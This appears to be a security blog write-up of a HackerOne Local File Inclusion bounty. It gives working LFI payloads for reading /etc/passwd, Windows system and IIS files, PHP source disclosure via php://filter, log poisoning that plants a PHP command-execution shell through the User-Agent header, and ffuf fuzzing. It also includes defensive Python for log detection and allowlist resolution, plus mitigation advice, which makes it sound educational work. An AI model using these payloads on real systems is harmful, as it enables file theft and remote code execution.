Exploiting LFI Vulnerability: A $600 Bounty Case Study

In a recent HackerOne report, a security researcher earned a $600 bounty for a Local File Inclusion (LFI) vulnerability, demonstrated with the payload:

//c:%2fwindows%2fwin.ini 

The path separators are percent-encoded (%2f for /) and the path starts with a doubled slash, variations that commonly get past filters which look for a literal ../ or / in the raw parameter while the server still decodes them into a valid Windows path. win.ini is harmless in itself; reading it proves that the include follows an attacker-controlled path, and the same path can point at credential files, source code or logs. That is the risk of passing user input straight into a file include without validation.

You Should Know: LFI Exploitation Techniques

1. Basic LFI Payloads

Access common files on Windows/Linux:

http://vulnerable-site.com/page.php?file=../../../etc/passwd 
http://vulnerable-site.com/page.php?file=//c:/windows/system.ini 

2. PHP Wrapper Exploits

Use the php://filter wrapper to read PHP source as base64 (including the file directly would execute it instead of showing it):

http://vulnerable-site.com/page.php?file=php://filter/convert.base64-encode/resource=index.php 

Decode the output with:

echo "PD9waHA..." | base64 -d 

3. Log Poisoning

Plant PHP code in a file the server writes and the PHP process can read, for example the Apache or Nginx access log, by sending it in the User-Agent header:

curl -X GET "http://vulnerable-site.com/page.php?file=/var/log/apache2/access.log" -H "User-Agent: <?php system($_GET['cmd']); ?>" 

Then include the log, which now contains the payload, and pass the command in the cmd parameter:

http://vulnerable-site.com/page.php?file=/var/log/apache2/access.log&cmd=id 

This only works if the log is readable by the web server user. On default Debian-derived installs /var/log/apache2 and its files belong to root:adm with no access for others, so www-data cannot read them; other candidates are the error log, mail logs, /proc/self/environ, PHP session files and anything else the attacker can write to and the PHP process can read.
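As an added example (not code from the HackerOne report or from Undercode), the Python below runs the detection a defender would pair with this technique over constructed Apache combined-format log lines: it decodes the file parameter, flags traversal (including percent- and double-encoded variants), absolute or drive-letter paths and php:// wrappers, and flags PHP tags planted in the User-Agent or Referer. The log lines, the RFC 5737 test addresses and the page.php endpoint are constructed for the example; the probes themselves are the ones shown on this page.

```python
"""Flag LFI probes and log-poisoning attempts in Apache combined-format logs.

Added example, not code from the HackerOne report or from Undercode. The
log lines below are constructed for illustration (RFC 5737 test addresses,
an assumed page.php endpoint); the patterns are the ones used on this page.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" LogFormat:
#   %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

TRAVERSAL_RE = re.compile(r'\.\./|\.\.\\')                  # ../ or ..\
ABSOLUTE_RE = re.compile(r'^(/|[a-z]:)', re.IGNORECASE)     # /etc/..., //c:..., c:\...
WRAPPER_RE = re.compile(r'^(php|expect|data|phar|zip)://', re.IGNORECASE)
PHP_TAG_RE = re.compile(r'<\?(php|=)', re.IGNORECASE)      # code planted for poisoning

# Constructed sample: one legitimate request, the probes from this page,
# a double-encoded traversal, a poisoning request and its trigger.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "GET /page.php?file=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:02 +0000] "GET /page.php?file=../../../etc/passwd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "GET /page.php?file=//c:%2fwindows%2fwin.ini HTTP/1.1" 200 403 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:04 +0000] "GET /page.php?file=%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1842 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:05 +0000] "GET /page.php?file=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9021 "-" "curl/8.5.0"
203.0.113.7 - - [10/Mar/2024:12:00:06 +0000] "GET /page.php?file=/var/log/apache2/access.log HTTP/1.1" 200 77213 "-" "<?php system($_GET['cmd']); ?>"
203.0.113.7 - - [10/Mar/2024:12:00:07 +0000] "GET /page.php?file=/var/log/apache2/access.log&cmd=id HTTP/1.1" 200 77350 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Mar/2024:12:00:08 +0000] "GET /about.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""


def file_param(target: str) -> str:
    """Return the ``file=`` value from a request target, decoded twice so that
    double-encoded payloads (%252e -> %2e -> .) are seen in their final form."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("file", [])
    return unquote(values[0]) if values else ""


def classify(line: str) -> list:
    """Tags describing why a log line is suspicious; [] for clean or unparsed lines."""
    m = LOG_RE.match(line)
    if not m:
        return []
    tags = []
    value = file_param(m["target"])
    if TRAVERSAL_RE.search(value):
        tags.append("traversal")
    if ABSOLUTE_RE.match(value):
        tags.append("absolute-path")
    if WRAPPER_RE.match(value):
        tags.append("php-wrapper")
    # Poisoning plants PHP in a header the server copies into its own log.
    if PHP_TAG_RE.search(m["ua"]) or PHP_TAG_RE.search(m["referer"]):
        tags.append("log-poisoning")
    return tags


def scan(log_text: str = SAMPLE_LOG) -> list:
    """(ip, request target, tags) for every flagged line in the log text."""
    findings = []
    for line in log_text.splitlines():
        tags = classify(line)
        if tags:
            m = LOG_RE.match(line)
            findings.append((m["ip"], m["target"], tags))
    return findings


if __name__ == "__main__":
    for ip, target, tags in scan():
        print(f"{ip:15} {','.join(tags):35} {target}")
```

The second decode in file_param is deliberate: a rule that only decodes once misses %252e%252e%252f, which the web server decodes to %2e%2e%2f and PHP's own handling of the parameter may decode again. The poisoning line is flagged even though its request target looks like an ordinary absolute path, because the check looks at the headers the server logs, not only at the URL.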

4. Windows-Specific Tricks

  • Read the SAM backup that older Windows versions keep in the repair directory (the live hive under System32\config is locked while Windows runs, and the backup is readable only if the web server's account has the rights):
    //c:/windows/repair/sam 
    
  • Read the IIS configuration, which lists site bindings, virtual directory paths and application pool settings:
    //c:/windows/system32/inetsrv/config/applicationHost.config 
    

5. Automation with ffuf

Brute-force common paths:

ffuf -u "http://vulnerable-site.com/page.php?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-Linux.txt 

What Undercode Say

LFI vulnerabilities remain a critical threat, especially when combined with other weaknesses like directory traversal or log injection. Always:
– Treat the parameter as a name, not a path: map it against an allowlist of known files and build the filesystem path server-side.
– Do not rely on denylists for ../ or /; they are defeated by encoding, as the win.ini payload shows.
– Set allow_url_fopen and allow_url_include to Off and do not load the expect extension. Note that php://filter cannot be switched off, so the allowlist is the real fix.
– Run PHP under a restricted user with open_basedir set, and use chroot/jail mechanisms where possible.
– Alert on traversal sequences, their encoded variants, wrapper schemes and PHP tags in request headers in the access logs.
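The following added Python example (not code from the HackerOne report, from Undercode or from the affected target) puts a hypothetical deny-list filter of the kind that percent-encoded payloads defeat next to the allowlist resolution recommended above, and runs both over the payloads used on this page. ALLOWED_PAGES, TEMPLATE_DIR and the two resolvers are assumptions made for the illustration, not a description of the target's code.

```python
"""Deny-list filtering vs. allowlist resolution for a ``?file=`` parameter.

Added example, not code from the HackerOne report or from Undercode.
The naive resolver is a hypothetical filter of the kind percent-encoded
payloads defeat; the safe resolver is the allowlist approach recommended
above. ALLOWED_PAGES and TEMPLATE_DIR are assumptions for the illustration.
"""
from typing import Optional
from urllib.parse import unquote
import posixpath

# Assumed for the example: the only templates page.php should ever include.
ALLOWED_PAGES = {"home", "about", "contact"}
TEMPLATE_DIR = "/var/www/app/templates"


def naive_is_blocked(raw: str) -> bool:
    """Deny-list check on the *raw* parameter. It looks for a literal
    traversal sequence before URL-decoding, so %2e%2e%2f slips through, and
    it ignores absolute paths, drive letters and php:// wrappers entirely."""
    return "../" in raw or "..\\" in raw


def naive_resolve(raw: str) -> Optional[str]:
    """Vulnerable: check first, decode second, then trust the result."""
    if naive_is_blocked(raw):
        return None
    return unquote(raw)  # what would reach include()


def safe_resolve(raw: str) -> Optional[str]:
    """Hardened: the parameter is a *name*, never a path. It must match the
    allowlist exactly; the filesystem path is built server-side and then
    re-checked to stay under TEMPLATE_DIR as defence in depth."""
    name = unquote(raw)
    if name not in ALLOWED_PAGES:
        return None
    path = posixpath.normpath(posixpath.join(TEMPLATE_DIR, name + ".php"))
    if not path.startswith(TEMPLATE_DIR + "/"):
        return None
    return path


# The payloads used on this page, plus an encoded traversal and an
# allowlisted name with traversal appended.
PAYLOADS = [
    "//c:%2fwindows%2fwin.ini",
    "../../../etc/passwd",
    "%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "//c:/windows/system.ini",
    "php://filter/convert.base64-encode/resource=index.php",
    "/var/log/apache2/access.log",
    "home",
    "home%2f..%2f..%2fetc%2fpasswd",
]


def compare(payloads=PAYLOADS) -> dict:
    """Map each payload to (what the naive code would include, what the safe code would)."""
    return {p: (naive_resolve(p), safe_resolve(p)) for p in payloads}


if __name__ == "__main__":
    for payload, (naive, safe) in compare().items():
        print(f"{payload:55} naive={naive!r:45} safe={safe!r}")
```

Run as a script, the table shows the deny-list stopping exactly one of the eight payloads (the literal ../../../etc/passwd) while the allowlist resolver accepts only "home". The startswith check at the end of safe_resolve is redundant as long as ALLOWED_PAGES holds plain names; it is there so that a careless future entry such as "../config" still cannot escape the template directory.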

Expected output of the log-poisoning step (cmd=id), showing that commands run as the web server user:

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Prediction

As web applications grow more complex, LFI vulnerabilities will increasingly intersect with cloud weaknesses, for example reaching the AWS instance metadata service when the same include sink also fetches URLs (SSRF+LFI). Researchers should explore such hybrid attack vectors in 2024.

Reference: HackerOne Report

Reported By: Alhasan Abbas – Hackers Feeds
